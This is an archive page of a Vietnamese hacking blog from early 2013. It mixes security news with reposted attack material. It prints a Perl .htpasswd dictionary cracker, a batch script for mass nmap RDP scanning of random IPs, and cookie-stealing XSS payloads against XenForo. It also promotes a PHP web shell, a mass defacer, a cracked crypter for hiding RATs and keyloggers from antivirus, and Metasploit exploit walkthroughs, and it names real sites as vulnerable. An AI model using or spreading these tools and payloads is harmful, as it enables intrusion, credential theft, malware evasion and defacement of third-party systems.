Nếu hack thành công vào hệ điều hành Chrome OS của Google, hacker không những không gặp phải rắc rối về pháp lý mà thậm chí còn có cơ hội nhận được giải thưởng lên đến hơn 3 triệu USD do chính Google trao tặng.
Thứ Ba, 29 tháng 1, 2013
Kỹ thuật tấn công Pass the Hash và cách phòng chống
Phân tích kỹ thuật tấn công Pass the Hash
Cách thức hoạt động của kỹ thuật tấn công Pass the Hash và minh họa các quá trình sử dụng thành công giá trị hash của mật khẩu lấy được mà không cần phải crack để có các nội dung đã được che giấu của nó.
READ MORE »
Cách thức hoạt động của kỹ thuật tấn công Pass the Hash và minh họa các quá trình sử dụng thành công giá trị hash của mật khẩu lấy được mà không cần phải crack để có các nội dung đã được che giấu của nó.
READ MORE »
Thứ Sáu, 25 tháng 1, 2013
Exploiting Java Applet AverageRangeStatisticImpl Remote Code Execution
Hoy 23 de Enero, Oracle nuevamente es blanco de los "Hackers", pues se ha publicado una nueva vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores, permitiendo a un atacante ejecutar código remoto en el sistema de la victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.
READ MORE »
Thứ Tư, 23 tháng 1, 2013
Kết nối Wifi không cần biết mật khẩu
Bài viết sau đây sẽ hướng dẫn cách connect vào wifi mà không cần password đơn giản mà hiệu quả. Các bạn sẽ không phải đau đầu đi tìm các phần mềm hack/crack pass wifi nữa mà thông qua pass của máy tính đã connect wifi trước đó.
READ MORE »
READ MORE »
Thứ Ba, 22 tháng 1, 2013
Lỗ hổng bảo mật - những hiểu biết căn bản
Ngày nay, kiếm được một phần mềm anti virus hoạt động hiệu quả và không tốn quá nhiều tài nguyên máy không còn quá khó như một vài năm trước.
Điểm danh những phần mềm miễn phí, ta có AVG, Avast, Avira, thậm chí việc kiếm key bản quyền xịn của những Kaspersky, Bitdefender cũng không còn quá khó và đắt đỏ.
Nhưng khi nói đến bảo mật, có rất nhiều khía cạnh ta cần lưu tâm, trong đó tìm kiếm và cài đặt một phần mềm antivirus tốt mới chỉ là một mặt của vấn đề.
Điểm danh những phần mềm miễn phí, ta có AVG, Avast, Avira, thậm chí việc kiếm key bản quyền xịn của những Kaspersky, Bitdefender cũng không còn quá khó và đắt đỏ.
Nhưng khi nói đến bảo mật, có rất nhiều khía cạnh ta cần lưu tâm, trong đó tìm kiếm và cài đặt một phần mềm antivirus tốt mới chỉ là một mặt của vấn đề.
Thứ Hai, 21 tháng 1, 2013
Chủ Nhật, 20 tháng 1, 2013
Stealing Session's Via HTML Injection
Stealing Session's Via HTML Injection
Download Video: http://www.mediafire.com/?c45nf3t4f84b0zf
Password: junookyo
Download Video: http://www.mediafire.com/?c45nf3t4f84b0zf
Password: junookyo
Cross Site Scripting filtration Bypass
This Tutorial Was Not Originally written by Me
_1
__________________________________________
Introduction To Xss(Cross site scripting):
'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability that exist in era of both web applications
as well as os based applications, but in most cases in web applications.You might be wondering why it's known as 'xss' not
'css' reffering to the full form.Well, basically css is already a reserved abbreviation of 'Cascade Style Sheets'.It allows
malicious code to be executed on a vulnerable server most probably session hijacking to gain administrator privileges.
Xss totally depends on cookies and session and though 'cookies' are known as the backbone of Cross-Site Scripting
Vulnerability.
Simple XSS Vulnerability Patch
Download video: http://www.mediafire.com/?6s49anyo3l3pofo
Password Unlock: junookyo
Thứ Bảy, 19 tháng 1, 2013
Danger Based XSS (Cross Site Scripting)
Tutorial about Dom base XSS.
Download here: http://www.mediafire.com/?w0i9gt4m5cu7gbo
Password: junookyo
Cross-Site Scripting for Fun and Profit
/==========================================================\
---------------------------------[ PLAYHACK.net ]---------------------------------
\==========================================================/
-[ INFOS ]-----------------------------------------------------------------------
Title: "Cross-Site Scripting for Fun and Profit"
Author: Nexus
Website: http://nexus.playhack.net
Date: 2007-04-08 (ISO 8601)
---------------------------------------------------------------------------------
READ MORE »
---------------------------------[ PLAYHACK.net ]---------------------------------
\==========================================================/
-[ INFOS ]-----------------------------------------------------------------------
Title: "Cross-Site Scripting for Fun and Profit"
Author: Nexus
Website: http://nexus.playhack.net
Date: 2007-04-08 (ISO 8601)
---------------------------------------------------------------------------------
READ MORE »
RDP Cracking IP List Maker Script
I found these script on google so all credits goes to coder
Save this Script as name "blah.bat"
READ MORE »
Save this Script as name "blah.bat"
Code:
@echo off
for /l %%%x in (1,1,2) do (
start "rdp" /HIGH nmap -n -Pn -p T:3389 -T5 --script rdp.nse -iR 0
)
exit
.htpasswd crack exploit
#! /usr/bin/perl
# crack.pl by fwaggle root@fwaggle.net
open (PASSFILE, "senhas");
my @passfile = <PASSFILE>;
close PASSFILE;
open (DICTFILE, "dictionary.txt");
my @dictfile = <DICTFILE>;
close DICTFILE;
foreach $line (@passfile) {
my ($username, $encpass) = split(/:/, $line);
foreach $attempt (@dictfile) {
if ($encpass eq crypt($attempt, $encpass)) {
print("Cracked: ${username}:${attempt}\n");
}
}
}
MadSpot Shell v2 (Released)
This is offical 2nd php shell by Madleets Team
this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
READ MORE »
this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
READ MORE »
Writing an XSS Worm
===========================
Writing an XSS worm
Version 0.3 (Updated 17/10/06)
By kuza55
===========================
READ MORE »
Writing an XSS worm
Version 0.3 (Updated 17/10/06)
By kuza55
===========================
READ MORE »
Wordpress Plugins Spotlight Upload Vulnerability
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.comREAD MORE »
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.comREAD MORE »
XSS vul in Xenforo CMS
Title: XSS vul in Xenforo CMS.
Author: Darksnipper
CMS Link: www.xenforo.com
vul type: XSS.
VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >
Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army
Or read here:
http://www.exploit4arab.com/exploits/321
Author: Darksnipper
CMS Link: www.xenforo.com
vul type: XSS.
VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >
Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army
Or read here:
http://www.exploit4arab.com/exploits/321
Prv8 wordpress and joomla mass defacer
Download:
http://www.mediafire.com/?sftiwmr8szfseb2
Pass: junookyo
Nemesis Crypter Fully Cracked
Nemesis Crypter is a good tool to FUD your RAT or Keylogger. It was used to make FUD but now it is only UD (Undetectable) but anyways its a nice tool with many impressive options for your use. Just click on cancel when it asks you for serial key :) . Sometimes some antivirus detects it as virus but dont worry it is a valse positive. There is about 2/6 chances of antivirus to detect it. Its false positive.READ MORE »
Ultimate Graphics Resources ~ Collection of Links and Tutorials
STOCKS:
http://www.photorack.net/
http://imagebase.davidniblack.com/main.php
http://freelargephotos.com/
http://public-domain-photos.com/
http://www.dexhaus.com/v2/home.html?1657
http://www.freeimages.co.uk/
http://www.fromoldbooks.org/
http://www.pdphoto.org/
http://www.shutterstock.com/
http://openphoto.net/
http://www.bigfoto.com/
http://www.cepolina.com/freephoto/
http://sassy-stock.deviantart.com/
http://www.freephotosbank.com/
http://visipix.dynalias.com/index_hidden.htm
http://www.turbophoto.com/Free-Stock-Images/
http://www.freestockimages.net/
http://www.freerangestock.com/
http://www.dreamstime.com/
http://www.freefoto.com/index.jsp
http://www.adigitaldreamer.com/gallery/
http://www.creatingonline.com/stock_photos/
http://www.imageafter.com/
http://www.stockvault.net/
http://www.kavewall.com/
http://www.deviantart.com/
http://www.flickr.com/
http://www.morguefile.com/
http://everystockphoto.com/
http://www.sxc.hu/
http://lillyfly06-stock.deviantart.com/
http://katanaz-stock.deviantart.com/
READ MORE »
Hunting for XSS Vulnerabilities
Finding an xss’s vulnerable website is not very difficult.
In most cases can write in the search:
Code:
“><script>alert(‘try_xss’);</script>
This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.
READ MORE »
Joomla Administrator Login BruteForcer [Python]
Hacking Websites via LFI (Simple, Short and easy)
1. Introduction
2. /proc/self/environ
3. PHP injection
4. Accessing the shell
Exploiting New Java 0-day with Metasploit
Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.
READ MORE »
SQL Injection to Shell with SQLMap
Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).
READ MORE »
Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit
Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo que contengan estas versiones vulnerables. Recordar que en la actualidad existen muchos exploits remotos que pueden vulnerar este navegador, pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que hasta la actualidad se puede seguir explotando.
El respectivo modulo que se integra en Metasploit se aprovecha de una vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor (mshtml). Este exploit utiliza una combinación de aspersión y el módulo de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y ASLR aprovechándose así para tomar el control total del sistema vulnerable.
A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.
READ MORE »
Thứ Tư, 16 tháng 1, 2013
[Warning] TenTen.vn - Cross Site Scripting
- Exploit: Cross Site Scripting (XSS)
- Description: Inject script via some inputs.
- Tình trạng: (Đang liên hệ QTV).
Thứ Hai, 14 tháng 1, 2013
Cách gửi email mã hóa qua Gmail trên Chrome
Phần mở rộng (extension) miễn phí của Google Chrome cho phép gửi đi email được mã hóa từ Gmail tới các dịch vụ email khác. Bạn cần gửi đi một email chứa thông tin nhạy cảm? Mọi email gửi đi theo cách thông thường đều có nguy cơ bị chặn hoặc bị “hack” trước khi đến tay người nhận.
Foxit Reader dính lỗ hổng bảo mật nghiêm trọng
Ứng dụng xem file PDF, Foxit Reader, vừa bị phát hiện dính lỗ hổng nghiêm trọng trong thành phần plug-in, có thể bị khai thác để thực thi các mã tùy chỉnh trên máy tính.
Thông tin chi tiết về lỗ hổng và cách khai thác lỗ hổng đã được hacker độc lập người Ý, Andrea Micalizzi công bố công khai vào tuần trước.
READ MORE »
Thông tin chi tiết về lỗ hổng và cách khai thác lỗ hổng đã được hacker độc lập người Ý, Andrea Micalizzi công bố công khai vào tuần trước.
Java dù được sửa lỗi vẫn chưa an toàn
Oracle vá lỗi bảo mật nghiêm trọng cho Java
Hãng phần mềm vừa tung ra Java Version 7 Update 11 nhằm ngăn kẻ xấu lợi dụng lỗ hổng bảo mật để điều khiển máy tính từ xa.
READ MORE »
READ MORE »
Cách vô hiệu hóa Java đang gây lỗi nguy hiểm cho máy tính
Các chuyên gia bảo mật mới đây vừa lên tiếng cảnh báo người dùng nên tắt Java trên trình duyệt của họ để bảo vệ máy tính, bởi Java đang gặp lỗ hổng bảo mật rất lớn và hacker đang lợi dụng các lổ hổng này để tấn công người dùng. Đi tiên phong trong việc này là Apple và Mozilla. "Táo khuyết" đã vô hiệu hóa plugin Java 7 trên OS X; còn Mozilla đưa các add-on Java 7 Update 9, Java 7 Update 10, Java 6 Update 37, and Java 6 Update 38 vào "danh sách đen" không cho tải về. Bởi thế, người dùng cần vô hiệu hóa Java trên trình duyệt của mình để tránh các nguy cơ bị tấn công trong khi chờ đợi 1 phiên bản cập nhật Java có thể vá các lỗ hổng bảo mật.
Chủ Nhật, 13 tháng 1, 2013
Cảnh báo virus lấy cắp thông tin tài khoản ngân hàng
Gần đây, virus Eurograbber đã được các tin tặc sử dụng để lấy cắp 36 triệu euro từ nhiều tài khoản ngân hàng tại các nước châu Âu.
READ MORE »
Trong thời gian qua, trên thế giới đã xuất hiện nhiều vụ lừa đảo trên mạng Internet do các đối tượng lợi dụng sự bất cẩn của người sử dụng để cài đặt virus độc hại trên máy tính cá nhân và thiết bị di động, từ đó lấy cắp thông tin và tiền từ tài khoản ngân hàng.
Thứ Bảy, 12 tháng 1, 2013
40 basic linux command-line tips and tricks
Thân chào các linux sysadmin, dưới đây là 40 mẹo/thủ thuật cơ bản mà không hẳn là dân quản trị nào cũng đã nắm qua.
Anh chị em nào có mẹo hay hay thì bổ sung cho có khí thế. Còn rất nhiều và không phải tất cả đều đúng trên mọi hệ thống nhé !
READ MORE »
Anh chị em nào có mẹo hay hay thì bổ sung cho có khí thế. Còn rất nhiều và không phải tất cả đều đúng trên mọi hệ thống nhé !
READ MORE »
pfSense 2.0.1 XSS / CSRF / Remote Command Execution Vulnerabilities
pfSense là 1 Open Source Filewall Distribution rất phổ dụng. thường dùng làm chốt chặn đầu ra internet rất hiệu quả trong doanh nghiệp cũng như các tổ chức (ưu điểm là Open Source và dễ dùng), thế nên các các lỗ hổng dưới đây nếu biết cách khai thác thì sẽ có khối việc để quan tâm đấy!
READ MORE »
READ MORE »
Con đường trở thành lập trình viên PHP
Lương lập trình viên PHP lúc mới ra trường chỉ khoảng 3 đến 5 triệu đồng một tháng, nhưng đây là thời gian để bạn tập trung vào nâng cao kỹ năng lập trình, kỹ năng mềm, làm việc nhóm, trau dồi ngoại ngữ... Những vị trí cấp cao trong lĩnh vực này lương có thể tới 2.000 USD.
READ MORE »
READ MORE »
[Warning] Dmart.vn - SQL Injection
- Exploit: SQL Injection
- Description: Query from TopX.
- Đánh giá: Nghiêm trọng.
- Tình trạng: (Đang liên hệ Quản trị viên).
Java Applet JMX Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to |
# redistribution and commercial restrictions. Please see the Metasploit |
# web site for more information on licensing and terms of use. |
# http://metasploit.com/ |
##
READ MORE »
Cẩn thận với các mánh hack wifi lan truyền trên mạng
Trong thời đại lên ngôi của các thiết bị di động thông minh như smartphone, tablet hay laptop, mạng wifi đã trở nên vô cùng thân thuộc đối với các hộ gia đình tại Việt Nam.
Hầu hết mọi người đều ý thức được tầm quan trọng của việc đặt mật khẩu cho mạng không dây để bảo vệ băng thông đường truyền cũng như ngăn chặn kẻ xấu đột nhập vào máy tính nhằm ăn cắp dữ liệu mật. Do đó gần như tất cả những ai sử dụng modem, router wifi đều đã thiết lập password trong lần đầu tiên lắp đặt và vận hành thiết bị.
Hầu hết mọi người đều ý thức được tầm quan trọng của việc đặt mật khẩu cho mạng không dây để bảo vệ băng thông đường truyền cũng như ngăn chặn kẻ xấu đột nhập vào máy tính nhằm ăn cắp dữ liệu mật. Do đó gần như tất cả những ai sử dụng modem, router wifi đều đã thiết lập password trong lần đầu tiên lắp đặt và vận hành thiết bị.
Thứ Sáu, 11 tháng 1, 2013
Skydreamer HTML5 responsive vCard
home : http://themeforest.net/item/skydream...-vcard/2950493
demo : http://simplesphere.net/html5/
Skydreamer HTML5 responsive vCard is a simple, minimalistic, clean and easy to set up CSS3 Vcard template. It can be adpated for both personal or commercial (business) use. A great way to showcase your portfolio, Skydreamer HTML5 vCard comes with a unique design, that adapts to different screen sizes with adequate comments all over the theme files and a solid documentation. The template has a unique and impressive look that will satisfy every taste.
Please rate my design so that I can further improve my upcoming themes
READ MORE »
Thứ Năm, 10 tháng 1, 2013
[Photoshop] Bộ sưu tập các kiểu tóc
Bộ sưu tập gồm rất nhiều kiểu tóc nam và nữ dành cho photoshop, rất đẹp.Với bộ sưu tập này bạn có thể thảo sức sáng tạo của mình để tạo ra những bức ảnh cùng với kiểu tóc mà mình hằng mong đợi.
Link download:
Link download:
http://www.mediafire.com/?h5kxfpnri0j5m8o
Another Stored XSS in Facebook.com
Another Stored XSS in Facebook.com, Another 3500$ Bounty
Hi,
I want to share my Stored XSS finding in facebook.com,
Gửi tệp tin .exe ngay trong Gmail
Gmail và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm. Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.
READ MORE »
[Tutorial] Race condition attack trên ứng dụng web
Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
READ MORE »
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
READ MORE »
Thứ Tư, 9 tháng 1, 2013
Yahoo! chặn lỗi nguy hiểm trong mail
TTO - Khi nhấn vào liên kết được gửi trong email Yahoo! Mail, kể cả từ địa chỉ người quen, hacker sẽ có thể khai thác lỗi và gửi hàng loạt email tương tự đến tất cả địa chỉ trong danh bạ.
Ảnh minh họa: Internet |
Thứ Hai, 7 tháng 1, 2013
Chủ Nhật, 6 tháng 1, 2013
Cracking wifi wpa-psk Networks (Learn How to Protect your Privacy)
HD 720p: http://www.youtube.com/watch?v=nps0zPB78fk (open in new tab).
How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com)
Hi,
I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.
Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion), You may unintentionally expose your organization to these kind of risks
READ MORE »
I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.
Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion), You may unintentionally expose your organization to these kind of risks
READ MORE »
[TUT] - Khai thác lỗi Microsoft IIS tilde character ~
Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"
READ MORE »
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"
READ MORE »
Thứ Bảy, 5 tháng 1, 2013
How to crack cPanels
Hello guys this is AV.. Today i'll show you the two ways to crack cpanel
What we will need for this?
1. shelled website
2. the shelled website should be symlink enableled.
Lets start XD
READ MORE »
What we will need for this?
1. shelled website
2. the shelled website should be symlink enableled.
Lets start XD
READ MORE »
Online SQLi Scanner
Online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more Online SQLi scanner i found today so sharing with you people.
Its right here - http://www.poomplacedorm.com/hyde.php
Its right here - http://www.poomplacedorm.com/hyde.php
Thứ Sáu, 4 tháng 1, 2013
[Video TUT] Hướng dẫn tự tạo skin Yahoo
Đã có 1 bài hướng dẫn tại đây:
http://junookyo.blogspot.com/2012/12/huong-dan-tu-tao-skin-cho-yahoo.htmlMình làm video hướng dẫn 1 cách chi tiết và rõ ràng cho những bạn nào chưa làm được:
Xem HD tại tab mới nhé:
Thứ Năm, 3 tháng 1, 2013
[Warning] Dalathoiquan.net
- Exploit: SQL Injection
- Đánh giá: Nghiêm trọng.
- Khai thác: Query lấy thông tin User.
- Tình trạng: (Đã liên hệ Quản trị viên).
[Warning] ChauLinh.com - Cross Site Scripting
- Exploit: Cross Site Scripting (XSS)
- Description: Inject script từ form search.
- Tình trạng: Đang liên hệ quản trị viên.
[Warning] HangChinhHieu.vn - Cross Site Scripting
- Exploit: Cross Site Scripting (XSS)
- Description: Inject script từ form search (Bypass filter thành công).
- Tình trạng: Đã liên hệ Quản trị viên.
[Warning] ChoiGame24g.com - Cross Site Scripting
- Exploit: Cross Site Scripting (XSS)
- Description: Inject script từ form search.
- Tình trạng: Đang liên hệ Quản trị viên.
[Warning] HoaPhat.vn - Cross Site Scripting
- Exploit: Cross Site Scripting (XSS)
- Demo: http://tinyurl.com/agspglv (Short URL).
- Description: Inject script từ form search.
- Tình trạng: Đang liên hệ quản trị viên.
Thứ Ba, 1 tháng 1, 2013
GenXE: Generate Xss Exploit
Description
GenXE: Generate XSS Exploit (tool). Give us a simple cross-site scripting exploit: alert, GenXE generates complex exploit(s) for you.
GenXE Web Site
Download source:
http://sourceforge.net/projects/genxe/files/latest/download
Các lỗi HTTP khi truy cập web và cách sửa
Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và hướng dẫn cách giải quyết.
Đăng ký:
Bài đăng (Atom)